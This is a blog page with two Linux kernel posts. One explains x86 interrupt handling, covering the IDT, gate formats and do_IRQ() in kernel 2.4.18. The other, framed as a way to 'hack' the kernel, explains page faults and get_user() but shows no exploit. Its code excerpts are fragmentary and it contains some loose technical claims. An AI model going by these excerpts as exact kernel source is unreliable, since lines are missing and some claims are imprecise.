Sunday, January 22, 2006

Interrupt Handling Internals in Linux Kernel

Interrupt Handling Internals in Linux Kernel

Author: Gaurav Dhiman
Email :

- Introduction
- CPU Support for Handling Interrupts
- Details of Programmable Interrupt Controller
- Hardware checks performed by CPU
- Details of Interrupt Descriptor Table
- Task Gates
- Trap Gates
- Interrupt Gates
- Hardware checks for Interrupts
- Kernel Support for Handling Interrupts
- Low Level Interrupt Stubs
- Details of do_IRQ() function, core of Inteuupt Handling


This article talks about internal details of Interrupt Handling in Linux Kernel. This will discuss, the hardware prospective of interrupt handling from CPU, Linux Kernel's Interrupt Routing subsystem, Device Drivers's role in Interrupt handling.

Term Interrupt is self defined, Interrupts are signals sent to CPU on an INTR bus (connected to CPU) whenever any device want to get attention of CPU. As soon as the interrupt signal occurs, CPU defer the current activity and service the interruptby executing the interrupt handler corresponding to that interrupt number (also know as IRQ number).

One of the clasifications of Interrupts can be done as follows:
- Synchronous Interrupts (also know on as software interrupts)
- Asynchronous Interrupts (also know as hardware interrupts)

Basic difference between these is that, synchronous interrupts are generated by CPU's control unit on facing some abnormal condition; these are also know as exception in Intel's termenology. These are interrupts whihc are generated by CPU itself either when CPU detects an abnormal condition or CPU executes some of the special instructions like 'int' or 'int3' etc. on other hand, asynchronous interupts are those, which actually are generated by outside world (devices connected to CPU), As these interrupts can occur at any point of time, these are known as asynchronous interrupts.

Its important to note that both synchornous and asynchronous interrupts are handled by CPU on the completion of insturctionduring which the interrupt occur. Execution of a machine instruction is not done in one single CPU cycle, it take some cycles to complete. Any interrupt occurs in between the execution of instruction, will not be handled imediately, rather CPU will check of interrupts on the completion of instruction.

CPU support for handling interrupts

For handling interrupts there are few of the things which we expect the CPU to do on occurence of every interrupt. Wheneveran interrupt occurs, CPU performs some of the hardware checks, which are very much needed to make the system secure. Beforeexplaining the hardware checks, we will understand how the interrupts are routed to the CPU from hardware devices.

Details of Programmable Interrupt Controller

On Intel architecture, system devices (device controllers) are connected to a special device known as PIC (Programmable Interrupt Controller). CPU have two lines for receiving interrupt signals (NMI and INTR). NMI line is to recieve non-maskable interrupts; the interrupts which can not be masked, means which can not be blocked at any cost. These interrupts are of hightest priority and are rarely used. INTR line is the line on which all the interrupts from system devices are received. These interrupts can be masked or blocked. As all the interrupt signals need to be multiplxed on single CPU line, we need some mechanisum through which interrupts from different device controllers can be routed to single line of CPU. This routing or multiplexing is done PIC (Programmable Interrupt Controller). PIC sits between system devices and CPU and have multiple input lines; each line connected to different divice contollers in system. On other hand IPC have only one output line which is connected to the CPU's INTR line on which it sends signal to CPU.

There are two PIC controllers joined together and the output of second PIC controller is connected to the second input of first PCI. This setup allows maximum of 15 input lines on which different system device controllers can be connected. PIC have some programmable registers, through which CPU communicates with it (give command, mask/unmask interrup lines, read status). Both PICs have their own following registers:

- Mask Register
- Status Register

Mask register is used to mask/unmask a specific interrupt line. CPU can ask the PIC to mask (block) the specific interrupt by setting the corresponding bit in mask register. Unmasking can be done by clearing that bit. When a particular interrupt is being masked, PIC do receive the interrupts on its corresponding line, but do not send the interrupt to CPU in whihc case tCPU keps on doing what it was doing. When an interrupts are being masked, they are not lost, rather PIC remembers those anddo send the interrupt to CPU when CPU unmasks that interrupt line. Masking is different from blocking all the interrupts toCPU. CPU can ignore all the interrupts coming on INTR line by clearing the IF flag in EFLAGS register of CPU. When this bitis cleared, interrupts coming on INTR line are simply ignored by CPU, we can consider it to be blocking of interrupts. So now we understand that masking is done at PIC level and individual interrupt lines can be masked or unmasked, where as blocking is done at CPU level and is done for all the interrupts except NMI (Non-Maskable Interrupt), which is received on NMI line of CPU and can not be blocked or ignored.

Now days, interrupt architecture is not as simple as shown above. Now days machines uses the APIC (Advanced Programmable Interrupt Controller), which can support upto 256 interrupt lines. Along with APIC, every CPU also have inbuilt IO-APIC. We wont go into details of these right now (will be covered in future articles).

Hardware checks performed by CPU

Once the interrupt signal is received by CPU, CPU performs some hardware checks for which no software machine instructions are executed. Before looking into what these checks are, we need to understand some architecture spcific data structures maintained by kernel.

Details of Interrupt Descriptor Table

Kernel need to maintain one IDT (Interrupt Descriptor Table), which actually maps the interrupt line with the interrupt handler routine. This table is of 256 enteries and each entry is of 8 bytes. First 32 enteries of this table are used for exceptions and rest are used for hardware interrupts received from outer world. This table can contain three different type of enteries; these three different types are as follows:

- Task Gates
- Trap Gates
- Interrupt Gates

Lets see what these gates are where these are used.

Task Gates

Format of task gate entry is as follows:
- 0-15 bits ---- reserved (not used)
- 16-31 bits ---- points to the TSS (Task State Segment) entry of the process to which we need to switch.
- 32-39 bits ---- these bits are reserved and are not currently used.
- 40-43 bits ---- specify the type of entry (its value for task gate is 0101)
- 44th bit ---- always 0, not used
- 45-46 bits ---- this specifies the DPL (Decsriptor Previlege Level) level of gate entry.
- 47th bit ---- specifies if this entry is valid or not (1 - valid, 0 - invalid)
- 48-63 bits ---- reserved (not used)

Basically the task gates are used in IDT, to allow the user processs to make a context switch with another process without requesting the kernel to do this. As soon as this gate is hit (interrupt received on line for which there is a task gate in IDT), CPU saves the context (state of processor registers) of currently running process to the TSS of current process, whoseaddress is saved in TR (Task Register) of CPU. After saving the context of current process, CPU sets the CPU registers withthe values stored in the TSS of new process, whose pointer is saved in the 16-31 bits of the task gate. Once the registers are set with these new values, processor gets the new process and the context switch is done. Linux do not use the task gates, it only uses the trap and interrupt gates in IDT. So I will not explain the task gates any more.

Trap Gates

Format of trap gates is as follows:
- 0-15 bits ---- first 16 bits of a pointer to a kernel function which need to be invoked when this gate is hit
- 16-31 bits ---- indicates the index of segment descriptor in GDT (Global Descriptor Table)
- 32-36 bits ---- these bits are reserved and are not currently used.
- 37-39 bits ---- always 000, not used
- 40-43 bits ---- specify the type of entry (its value for trap gate is 1111)
- 44th bit ---- always 0, not used
- 45-46 bits ---- this specifies the DPL (Decsriptor Previlege Level) level of gate entry.
- 47th bit ---- specifies if this entry is valid or not (1 - valid, 0 - invalid)
- 48-63 bits ---- last 16 bits of a pointer to a kernel function which need to be invoked when this gate is hit

Trap gates are basically used to handle exceptions generated by CPU. 0-15 bits and 48-63 bits together form the pointer (offset in segment identified by 16-31 bits of this entry) to a kernel function. The only difference between trap gates and interrupt gates is that, whenever an interrupt gate is hit, CPU automatically disables the interrupts by clearing the IF flag in CPU's EFLAG register, whereas in case of trap gate this is not done and interrupts remain enabled. As mentioned earlier trap gates are used for exceptions, so first 32 enteries in IDT are initialized with trap gates. In addition to this Linux Kernel also uses the trap gate for system call entry (entry 128 of IDT).

Interrupt Gates

Format of interrupt gates is same as trap gates explained above, expect the value of type field (40-43 bits). In case of trap gates this have a value 1111 and in case of interrupts its 1110.

Format is as follows:
- 0-15 bits ---- first 16 bits of a pointer to a kernel function which need to be invoked when this gate is hit
- 16-31 bits ---- indicates the index of segment descriptor in GDT (Global Descriptor Table)
- 32-36 bits ---- these bits are reserved and are not currently used.
- 37-39 bits ---- always 000, not used
- 40-43 bits ---- specify the type of entry (its value for interrupt gate is 1110)
- 44th bit ---- always 0, not used
- 45-46 bits ---- this specifies the DPL (Decsriptor Previlege Level) level of gate entry.
- 47th bit ---- specifies if this entry is valid or not (1 - valid, 0 - invalid)
- 48-63 bits ---- last 16 bits of a pointer to a kernel function which need to be invoked when this gate is hit

Note: whenever the interrupt gate is hit, interrupts are disabled automatically.

Hardware Checks for Interrupts and Exceptions

Whenever an exception or interrupt occurs, corresponding trap/interrupt gate is hit and CPU performs some checks with fields of these gates. Things done by CPU are as follows:

1). get the ith entry from IDT (physical address and size of IDT is stored in IDTR register of CPU), here 'i' means the interrupt number.

2). read the segment descriptor index from 16-31 bits of IDT entry, lets say this to be 'n'

3). gets the segment descriptor from 'n'th entry in GDT (physical address and size of GDT is stored in GDTR register of CPU)

4). DPL of the nth entry in the GDT should be less that equal to CPL (Current Previelge Level, specified in the read-only lowermost two bits of CS register). Incase DPL > CPL, CPU will generate general protection exception. We will see ahead, whatdoes this check mean and why this is done. Simply saying:
a). DPL (of GDT entry) <= CPL ----- ok, switches stack if DPL < CPL
b). DPL (of GDT entry) > CPL ----- general protection exception
If DPL (of GDT entry) < CPL, we are entering the higher previlege level (probably from user to kernel mode). In this case CPU switches the hardware stack (SS and ESP registers) from currently running process's user mode stack to its kernel mode stack. We will see ahead, how this stack switch is exactly done. Note: stack switching idea has been mentioned here, but it actually happens after the 5th step mentioned below.

5). for software interrupts (generated by assembly instructions 'int'), one more check is done. This check is not performedfor hardware interrupts (interrupts generated by system devices and forwarded by PIC). Simply saying:
a). DPL (of IDT entry) >= CPL ---- ok, we have permission to enter through this gate
b). DPL < CPL ---- genreal protection exception

6). switches the stack if DPL (of GDT entry) < CPL. In addition to this mode of CPU (least significant two bits of CS) are also changed from CPL to DPL (of GDT entry)

7). if the stack switch has taken place (SS and ESP registers reset to kernelstack), then pushes the old values of SS and ESP (pointing to user stack) on this new stack (kernel stack)

8). pushes the EFALGS, CS and EIP registers on the stack (note: now we are working on kernel stack). This actually saves the pointer to user application instruction to which we need to return back after servicing the interrupt or exception

9). In case of exceptions, if there is any harware code, processor pushes that also on kernel stack

10). loads the CS with the value of GDT entry and EIP with the offset entry of IDT (0-15 bits + 48-63 bits)

All the above action is done by CPU hardware without the execution of any software instruction. Checks performed at step 4th and 5th (mentioned above) are important.

4th checks make sure that the code we are going to execute (Interrupt Service Routine) does not fall in a segment with lesser previlege. Obivously the ISR can not be in lesser previlege segment that what we are into. DPL or CPL can have 4 values (0,1,2 for kernel mode and 3 fo user mode). Out of these four only two are used, that is 0 (for kernel mode) and 3 (for user mode).

5th check makes sure that application can enter the kernel mode through specific gaes only, in Linux only through 128th gate entry which is for system call invocation. If we set the DPL field of IDT entry to be 0,1 or 2, application programme (running with CPL 3) cannot enter through that gate entry. If it tries, CPU will generate general protection exception. This is the reason that in Linux, DPL fields of all the IDT enteries (except 128th entry used for system call) are initialized with value '0', this makes sure only kernel code can access these gates not application code. In Linux 128th entry (used for system call) is of trap gate type and its DPL value is initialized to 3, so that application code can enter through this gate byassembly instruction "int 0x80"

Now lets see how does the stack switch happens when the DPL (of GDT entry) < CPL. CPU have TR (Task Register) register, which actually points to the TSS (Task Sate Segment) od currently running process. TSS is an architecture defined data structure which contains the stae of processor registers whenever context switch of this process happens. TSS include three sets of ESS and ESP fields, one for each level of processor (0,1 and 2). These fields specifies the stack to be used whenevr we entert that processor level. Lets say the DPL value in GDT entry is 0, in this case, CPU will load the SS register with the value of SS field in TSS for 0 level and ESP register with the value of ESP field in TSS for 0 level. After loading the SS and ESP with these values, CPU starts pointing to the new kernel level stack o current process. Old values of SS and ESP (CPU remembers them somehow) are now pushed on this new kernel level stack; this is done as we need to return back to old stack oncewe service the interrupts, exception or system call. Prudent readers must be wondering, why there is no firld for level 3 stack in TSS. Well the reason for this is that we never use the CPU's stack switching mechanism to switch from higher CPU level (kernel mode - 0,1 and 2) to lower CPU level (user mode - 3). This is the reason that CPU while entering the higher level(kernel mode) saves the previously used lower level stack (user mode) on the kernel stack.

Once all this CPU action is done, CPU's CS and EIP registers are pointing to the kernel functions written for handling interrupts or exceptions. CPU simply start executing the instructions at this point (now we are in kernel mode - level 0)

Kernel Support for Handling Interrupts

In this section, we will be covering and walk through the kernel code executed in interrupt context. I will be reffering the the code as per 2.4.18 release of kernel.

Low Level Interrupt Stubs

Whenever an interrupt occurs, CPU performs the above mentioned hardware checks and start executing the following assembly instructions in kernel, whose pointer (offest in kernel code segment) is stored correstonding IDT entry.

File: include/asm-i386/hw_irq.h

155 #define BUILD_COMMON_IRQ() 156 asmlinkage void call_do_IRQ(void); 157 __asm__( 158 "\n" __ALIGN_STR"\n" 159 "common_interrupt:\n\t" 160 SAVE_ALL 161 SYMBOL_NAME_STR(call_do_IRQ)":\n\t" 162 "call " SYMBOL_NAME_STR(do_IRQ) "\n\t" 163 "jmp ret_from_intr\n");

175 #define BUILD_IRQ(nr) 176 asmlinkage void IRQ_NAME(nr); 177 __asm__( 178 "\n"__ALIGN_STR"\n" 179 SYMBOL_NAME_STR(IRQ) #nr "_interrupt:\n\t" 180 "pushl $"#nr"-256\n\t" 181 "jmp common_interrupt");


This macros is used at the kernel initialization time to write out the lowest interrupt stubs, which can be called from IDTby saving there offsets (pointers) in IDT gates. Kernel maintains one global array of function pointers (name of array - interrupt) in which it stores the pointer of these stubs. Code related to creation of these stubs (using above mentioned BUILD_IRQ macro) and saving their pointers in the global array "interrupt[NR_IRQS]" can be seen in file "arch/x86_64/kernel/i8259.c". In this file you will see the usage of BUILD_IRQ macro to create the interrupt stubs as follows:

File: arch/i386/kernel/i8259.c

40 #define BI(x,y) 41 BUILD_IRQ(x##y)
43 #define BUILD_16_IRQS(x) 44 BI(x,0) BI(x,1) BI(x,2) BI(x,3) 45 BI(x,4) BI(x,5) BI(x,6) BI(x,7) 46 BI(x,8) BI(x,9) BI(x,a) BI(x,b) 47 BI(x,c) BI(x,d) BI(x,e) BI(x,f)
49 /*
50 * ISA PIC or low IO-APIC triggered (INTA-cycle or APIC) interrupts:
51 * (these are usually mapped to vectors 0x20-0x2f)
52 */
53 BUILD_16_IRQS(0x0)
55 #ifdef CONFIG_X86_IO_APIC
56 /*
57 * The IO-APIC gives us many more interrupt sources. Most of these
58 * are unused but an SMP system is supposed to have enough memory ...
59 * sometimes (mostly wrt. hw bugs) we get corrupted vectors all
60 * across the spectrum, so we really want to be prepared to get all
61 * of these. Plus, more powerful systems might have more than 64
62 * IO-APIC registers.
63 *
64 * (these are usually mapped into the 0x30-0xff vector range)
65 */
66 BUILD_16_IRQS(0x1) BUILD_16_IRQS(0x2) BUILD_16_IRQS(0x3)
67 BUILD_16_IRQS(0x4) BUILD_16_IRQS(0x5) BUILD_16_IRQS(0x6) BUILD_16_IRQS(0x7)
68 BUILD_16_IRQS(0x8) BUILD_16_IRQS(0x9) BUILD_16_IRQS(0xa) BUILD_16_IRQS(0xb)
69 BUILD_16_IRQS(0xc) BUILD_16_IRQS(0xd)
70 #endif
72 #undef BUILD_16_IRQS
73 #undef BI


Above code actually creates the interrupt stubs and do not place there pointers in interrupt[NR_IRQS] array. The code whichplaces the pointers of these stubs in global array is as follows and can be found in same file "arch/x86_64/kernel/i8259.c"

File: arch/i386/kernel/i8259.c

100 #define IRQ(x,y) 101 IRQ##x##y##_interrupt
103 #define IRQLIST_16(x) 104 IRQ(x,0), IRQ(x,1), IRQ(x,2), IRQ(x,3), 105 IRQ(x,4), IRQ(x,5), IRQ(x,6), IRQ(x,7), 106 IRQ(x,8), IRQ(x,9), IRQ(x,a), IRQ(x,b), 107 IRQ(x,c), IRQ(x,d), IRQ(x,e), IRQ(x,f)
109 void (*interrupt[NR_IRQS])(void) = {
110 IRQLIST_16(0x0),
112 #ifdef CONFIG_X86_IO_APIC
113 IRQLIST_16(0x1), IRQLIST_16(0x2),
114 IRQLIST_16(0x4), IRQLIST_16(0x5), IRQLIST_16(0x6),
115 IRQLIST_16(0x8), IRQLIST_16(0x9), IRQLIST_16(0xa),
116 IRQLIST_16(0xc), IRQLIST_16(0xd)
117 #endif
118 };
120 #undef IRQ
121 #undef IRQLIST_16


Above code actually filles the global array of function pointers (array name interrupt[NR_IRQS]). Once the global array is nitialized with the pointers to interrupt stubs, we initialize the IDT (Interrupt Descriptor Table) in function "init_IRQ()"using this global array as follows:

File: arch/i386/kernel/i8259.c, Function: init_IRQ()

for (i = 0; i < (NR_VECTORS - FIRST_EXTERNAL_VECTOR); i++) {
int vector = FIRST_EXTERNAL_VECTOR + i;
if (i >= NR_IRQS)
if (vector != IA32_SYSCALL_VECTOR && vector != KDB_VECTOR) {
set_intr_gate(vector, interrupt[i]);


In above loop, we loop over all the IDT enteries staring from "FIRST_EXTERNAL_VECTOR" (32, because first 32 enteries are for exception) and call "set_intr_gate()" function which actually set the interrupt gate descriptor. For entry 128, which is for system call invocation, interrupt gte is not set, for this rather trap gate is set and that is done in function trap_init(). In the same function init_IRQ(), after this looping, we initialize the IPI (Interprocessor Interrupts). These interruptsare sent from one CPU to another CPU in SMP machines.

Now we can see once these IDT eneries are set, whenever an interrupt occurs, CPU directly jumps to the code given in BUILD_IRQ macro. Now lets analyse what this macro do. Following is the code for BUILD_IRQ macro:

File: include/asm-i386/hw_irq.h

#define BUILD_IRQ(nr) asmlinkage void IRQ_NAME(nr); __asm__( "\n.p2align\n" "IRQ" #nr "_interrupt:\n\t" "push $" #nr "-256 ; " "jmp common_interrupt");


This assembly code first subtracts the IRQ number from 256 and pushes the result on kernel stack. After doing this it jumpsto "common_interrupt" assembly label, which simply saves the context of interrupted process (CPU resigters) on to kernel stack and then calls the C language function "do_IRQ()".

Details of do_IRQ() function, core of Inteuupt Handling

do_IRQ() is the common function to all hardware interrupts. This function is the most important to understand from the prespective of interrupt handling. We will first show the code of whole function and then explain it line by line in coming paragraphs with line refferences.

File: arch/i386/kernel/irq.c

563 asmlinkage unsigned int do_IRQ(struct pt_regs regs)
564 {
565 /*
566 * We ack quickly, we don't want the irq controller
567 * thinking we're snobs just because some other CPU has
568 * disabled global interrupts (we have already done the
569 * INT_ACK cycles, it's too late to try to pretend to the
570 * controller that we aren't taking the interrupt).
571 *
572 * 0 return value means that this irq is already being
573 * handled by some other CPU. (or is disabled)
574 */
575 int irq = regs.orig_eax & 0xff; /* high bits used in ret_from_
code */
576 int cpu = smp_processor_id();
577 irq_desc_t *desc = irq_desc + irq;
578 struct irqaction * action;
579 unsigned int status;
581 kstat.irqs[cpu][irq]++;
582 spin_lock(&desc->lock);
583 desc->handler->ack(irq);
584 /*
585 REPLAY is when Linux resends an IRQ that was dropped earlier
586 WAITING is used by probe to mark irqs that are being tested
587 */
588 status = desc->status & ~(IRQ_REPLAY | IRQ_WAITING);
589 status |= IRQ_PENDING; /* we _want_ to handle it */
591 /*
592 * If the IRQ is disabled for whatever reason, we cannot
593 * use the action we have.
594 */
595 action = NULL;
596 if (!(status & (IRQ_DISABLED | IRQ_INPROGRESS))) {
597 action = desc->action;
598 status &= ~IRQ_PENDING; /* we commit to handling */
599 status |= IRQ_INPROGRESS; /* we are handling it */
600 }
601 desc->status = status;
603 /*
604 * If there is no IRQ handler or it was disabled, exit early.
605 Since we set PENDING, if another processor is handling
606 a different instance of this same irq, the other processor
607 will take care of it.
608 */
609 if (!action)
610 goto out;
612 /*
613 * Edge triggered interrupts need to remember
614 * pending events.
615 * This applies to any hw interrupts that allow a second
616 * instance of the same irq to arrive while we are in do_IRQ
617 * or in the handler. But the code here only handles the _second_
618 * instance of the irq, not the third or fourth. So it is mostly
619 * useful for irq hardware that does not mask cleanly in an
620 * SMP environment.
621 */
622 for (;;) {
623 spin_unlock(&desc->lock);
624 handle_IRQ_event(irq, ®s, action);
625 spin_lock(&desc->lock);
627 if (!(desc->status & IRQ_PENDING))
628 break;
629 desc->status &= ~IRQ_PENDING;
630 }
631 desc->status &= ~IRQ_INPROGRESS;
632 out:
633 /*
634 * The ->end() handler has to deal with interrupts which got
635 * disabled while the handler was running.
636 */
637 desc->handler->end(irq);
638 spin_unlock(&desc->lock);
640 if (softirq_pending(cpu))
641 do_softirq();
642 return 1;
643 }


Here is the detailed explaination of do_IRQ() function, this has been
explained below line by line.

Line - 575 to 577
Get the number of the interrupt that got triggered. Its pushed on the kernel stack before pushing the context of the interrupted process. Get the processor or CPU id o which this code is being executed or in other means the CPU id of processor handling this interrupt. Get the pointer to the IRQ descriptor. IRQ descriptor is a kernel data structure which actually binds together the different ISRs (Interrupt Service Routines) registere by device drivers for same IRQ line. As mentioned earlieralso, same IRQ line can b shared between different devices, so their device drivers need to register their own ISRs to handle the interrupts genetated by these devices. IRQ descriptor data structure is defined as follows:

typedef struct {
unsigned int status;
hw_irq_controller *handler;
struct irqaction *action;
unsigned int depth;
spinlock_t lock;
} ____cacheline_aligned irq_desc_t;

Following is the significance of different elements in this stucture:

- status : Its a bit mask of different flags to identify the state of a particular IRQ line. We will see the use of differnet flags ahead in this article.

- handler : This is the pointer to the structure, whose each element is the pointer to the function related to the handlingof physical PIC (programmable interrupt controller). These functions are used to mask/unmask particular interrup line in PIC or to acknowledge the interrupt to PIC. The definitions of these PIC related functions can be found in file "arch/i386/kernel/i8259.c"

- action : This element is the pointer to the list o ISRs registered by different device drivers for this IRQ line. When a device driver registers its ISR to kernel using kernel function "irq_request()", the ISR is added to this list for that particular IRQ line.

- lock : This is spinlock to handle the synchronization problem while accessing any element in IRQ descriptor. Kernel execution context access the different elements of IRQ descriptor, but before doing so they should acquire this spinlock so that the synchronization can be maintained.

Line - 581 to 583
Here we increment the interrupt count received by this CPU, this is maintained for accounting purpose. Hold the spinlock before accessing any element of the IRQ descriptor for our interrupt line. We also mask and acknowledge the interrupt to PIC using handler function of our IRQ descriptor.

Line - 588 to 589
Now we clear the IRQ_REPLAY and IRQ_WAITING flags from ou IRQ descriptor flag. As mentioned earlier this is used to maintain the status of an interrupt handling line. We clear these flags because now we are going to handle this interrupt will not be anymore in reply or waiting mode. Actually IRQ_WAITING flagis used by device drivers in conjunction with IRQ_AUTODETECT flag for auto-detecting the IRQ line to which their device is connected. Device drivers use the probe_irq_on() function, which actually sets he IRQ_AUTODETECT and IRQ_WAITING flag for all the IRQ descriptors for whome no ISR has yet been registered.After calling probe_irq_on() function, device driver instructs the device to trigger an interrupt and then calls probe_irq_off(0 function. probe_irq_off() function actually looks for those IRQ descriptors whose IRQ_AUTODETECT flag is still set butIRQ_WAITING flag has been cleared. and returns the IRQ line number to device driver.

After clearing the IRQ_REPLAY and IRQ_WAITING flags in do_IRQ() function we set the IRQ_PENDING function. This is done, to indicate that we are planning to handle this interrupt if this interrupt is not disabled or not bein already handled by another CPU (in case of SMP machines). The use of setting IRQ_PENDING flag is explained in details in next few lines.

As we have see the interrupt and want to handle it by calling the set of ISRs (Interrupt Serive Routines) registered by different device drivers. We set IRQ_PENDING flag because seeing an interrupt does not mean we will for sure handle it. IRQ_PENDING flag helps us in following two cases:

- In case interrupt is disabled (set flag IRQ_DISABLED), we will not service the interrupt and will just keep it marked as pending (set flag IRQ_PENDING). Once the interrupt is again enabled (clear flag IRQ_DISABLED), ISRs will be called to service the interrupt. So IRQ_PENDING helps us to remember the intterupt which occured while that interrupt was disabled due to some reason.

Note: Here disabling interrupt does not mean masking a particular line at PIC level or disabling all the interrupt at CPU level by clearing the IF flag of CPU EFLAG register. Disabling here means the kernel has been asked not to service the interrupt, but the hardware triggering of interrupt signal is not being stopped at all.

- In case another CPU is already handling the previous interrupt requests on this IRQ line. In this case flag IRQ_INPROGRESS will already be set by that another CPU. Our role will be to just mark the interrupt as IRQ_PENDING and in away asks that other CPU to service this interrupt request also. When that CPU will finish its handling of previous interrupt, it will check this flag. Because of this flag being set by us, that CPU will again go and call all the ISRs once agian to service interrupt request we received on this IRQ line.

Line - 595 to 601
Now we check if this interrupt is not disabled (flag IRQ_DISABLED is clear) and at the same time is also not being handled by another CPU (flag IRQ_INPROGRESS is also clear), we go forward and clear the IRQ_PENDING flag and sets the IRQ_INPROGRESSflag to indicate that we take the responsibility of handling this interrupt request. Now while we are handling this interrupt request, lets sa another CPU receives an interrupt on same IRQ line, that CPU will simple mark the IRQ_PENDING flag and will transfer his responsibility to us and in that case we (CPU we are executing on) will be responsible to serve that interrupt request also.

Line - 609 to 610
If there is no registered ISR for this IRQ line, we simply return from interrupt context after releasig the lock we hold and serving the softirqs (if any pending).

Line - 622 to 630
Now we are al set to call the registered ISRs (device driver's functions), so that they can figure out which device connected to this IRQ line has actually triggered the interrupt and can serve it poperly. before calling the ISRs, we release the IRQ descriptor spinlock so that while we are executing the ISRs this spinlock can be acquired by another interrupt context, which may execute on another CPU for the same IRQ line. This interrupt context on another CPU will simply mark the IRQ_PENDING flag and return without handling the interrupt itself. In this infite loop we call the handle_IRQ_event() function which actualy calls all the ISRs registrered for this IRQ line one by one. After completing the list of ISRs, we again acquire the IRQdescriptor spinlock as we need to again check and update the flag element of IRQ descriptor. After acquiering the spinlock, we check is the IRQ_PENDING flag is clear, we break out of this infite loop, else we clear the IRQ_PENDING flag of our IRQ descriptor and again go into handle_IRQ_event() function to serve the new interrupt request as indicated by IRQ_PENDING flag.

Line - 631
Finally we come out of the above mentioned infite loop only if there is not pending request for thie IRQ line. Once we are out, we are done with the most of the part, so we clear the IRQ_INPROGRESS flag.

Line - 637 to 638
Now we call the end function of PIC related functions stored in handler element of our IRQ descriptor. This function take care of the situation where the interrupt we were handling got disabled while we were handling it. Lets sat while we were serving the interrupt by callings all the ISRs for it, the interrupt got disabled (flag IRQ_DISABLED is set) by code running onanother CPU, then in this case we should not unmask the interrupt line (which we masked by calling the PIC related ack() function, line 583). If the IRQ is not yet disabled, this function end() will simply unmask the interrupt line at PIC level and return. After this we go ahead and do serve the pending softirqs (is any marked). We will see in next section what are siftirqs. I will soon post the details of softirqs, tasklets and bottom halfs, so keep looking for that on my blog.

Saturday, August 27, 2005

Back Door Entry - Getting hold of Kernel

This article talks about a way to break the kernel and getting hold of it for your use, in other words a way to hack a kernel. We will talk in respect to Linux Kernel. Well the same thing can be applied to other kernels as well.


We all know about the paging mechanisum to implement the virtual memory . Virtual memory is actually implemented using page on demand concept. This means we do not load the whole program in memory in one go, rather we keep on loading the required part of program as requested. Whenever the program refers the code or data which is not in memory, system do page-faults. Page fault is an exception generated by the MMU (Memory Management Unit) of system. Whenever the page-fault exception occurs CPU starts executing the page-fault handler code pointed out by the page-fault entry of IDT (Interrupt Descriptor Table). I wont discuss details about IDT in this article, will be writting seperator article for that. In short IDT is the kernel data structure (an array of pointers to kernel functions which handle hardware interrupts and system generated exceptions). The IDT is pointed by the CPU's IDTR register, so CPU knows where the IDT in memory is, that is why whenever any hardware interrupt or exception occures, system automatically switches to the relevant code whose pointer is placed in IDT entry. Coming back to page-faults, as told earlier page-fault is an exception and can occur in system at any time (in user space as well as in kernel space).

Details about Page-Fault Handler:
Page-fault handler handles following specific cases:

- When page fault occures in user space (user application code)
- user programme accessed a virtual memory address out of its virtual user address space. In this case page fault handler will generate SEGV and the process will be terminated.
- user programme accessed a valid virtual memory address which is in user virtual address space but virtual page related to it is not in momory (page table is not set). In this case page-fault handler will swap-in the required virtual page into memory, set the required page table entry and will return back to the page faulted instruction.

- When page fault occures in kernel space (kernel code)
- Kernel access the user space virtual address and the page related to that address is not avaliable in memory. In this case related page will be swapped in and the kernel will access it.
- Kernel tries to access the user space virtual address, whcih does not fall in user address space. In this case, kernel should not generate SEGV, rather it should handle this situation gracefully. This is the case which we will mainly focus on in this article ahead.

Entering a System Call:

Before going ahead, lets see some code related to system call invocation, it will help us in understanding this article in a better way.

When we do any system call using the library function, CPU switches to kernel mode also CPU is set to use the kernel stack of the process. As soon the execution context enters the kernel mode, CPU jumps to the ollowing kernel function, which can be found in arch/i386/kernel/entry.S file in kernel sources

pushl %eax # save orig_eax
testb $0x02,tsk_ptrace(%ebx) # PT_TRACESYS
jne tracesys
cmpl $(NR_syscalls),%eax
jae badsys
call *SYMBOL_NAME(sys_call_table)(,%eax,4)
movl %eax,EAX(%esp) # save the return value

In this function first of all processor context (state of all the registers in a processor) is saved on kernel specific stack and then GET_CURRENT macro is called to get the pointer of process descriptor (task_struct) of currently running process on the CPU. Finally the function related to the requested system call is called by picking the function pointer from sys_call_table (a global array of pointers in kernel - also known as system call table in general terms). From this point onwards the called function is responsible for serving the requested functionality to user space program.

Handling of page-faults in kernel space:

Kernel access the user space provide address, when user space programme makes a system call to fetch/put some user data into kernel, for e.g. write/ read system calls, ioctl system call etc. In these system calls one of the parameters is the user space address. Kernel put/fetch some data from user space with the help of some special kernel function which handles the page faults gracefully, if they occur. Some of the kernel functions used to copy data from/to user space are as follows:


Lets take a simple example of ioctl() system call. Use of ioctl() function in a user programme will be something like this

int on = 1;
ioctl(fd, FIONBIO, &on);

When ioctl system call is done, in kernel sys_ioctl() is called, which further down the line calls one of the above mentioned functions to fetch/put data in user provided buffer. Lets take an example of get_user() kernel function. This is implemented in kernel as a macro and you can find the implementation in include/asm/uaccess.h file of kernel sources.

#define get_user(x,ptr) \
({ int __ret_gu,__val_gu; \
switch(sizeof (*(ptr))) { \
case 1: __get_user_x(1,__ret_gu,__val_gu,ptr); break; \
case 2: __get_user_x(2,__ret_gu,__val_gu,ptr); break; \
case 4: __get_user_x(4,__ret_gu,__val_gu,ptr); break; \
default: __get_user_x(X,__ret_gu,__val_gu,ptr); break; \
} \
(x) = (__typeof__(*(ptr)))__val_gu; \
__ret_gu; \

In this macro "ptr" is the user provided address which can do a page fault. This macro further calls another macro "__get_user_x" depending upon the size of "ptr" pointer passed from user space to kernel. Size of this pointer tells kernel how much bytes need to be copied from/to user space accordingly the "__get_user_x" function is called.

Implementation of "__get_user_x" macro is as follows in kernel, can be found in include/asm/uaccess.h file:

#define __get_user_x(size,ret,x,ptr) \
__asm__ __volatile__("call __get_user_" #size \
:"=a" (ret),"=d" (x) \
:"0" (ptr))

This function uses the assembly code to invoke one of the following functions written in assembly language:


We will only see the implementation of one of these functions to under stand it better. Lets analyse what "__get_user_4()" assembly function do. Implementation of this function is as follows in linux kernel, you can find its code in arch/i386/lib/getuser.S assembly file

.align 4
.globl __get_user_4
addl $3,%eax
movl %esp,%edx
jc bad_get_user
andl $0xffffe000,%edx
cmpl addr_limit(%edx),%eax
jae bad_get_user
3: movl -3(%eax),%edx
xorl %eax,%eax

xorl %edx,%edx
movl $-14,%eax

.section __ex_table,"a"
.long 1b,bad_get_user
.long 2b,bad_get_user
.long 3b,bad_get_user

This is the actual code in kernel which actually gets the specific number of bytes (in this case 4 bytes are copied) from user space buffer to kernel buffer. In this while copying the data we might face a page-fault and as we are currently in kernel mode, we need to handle such page-faults gracefully. We will shortly discuss some kernel data structures which help in this.

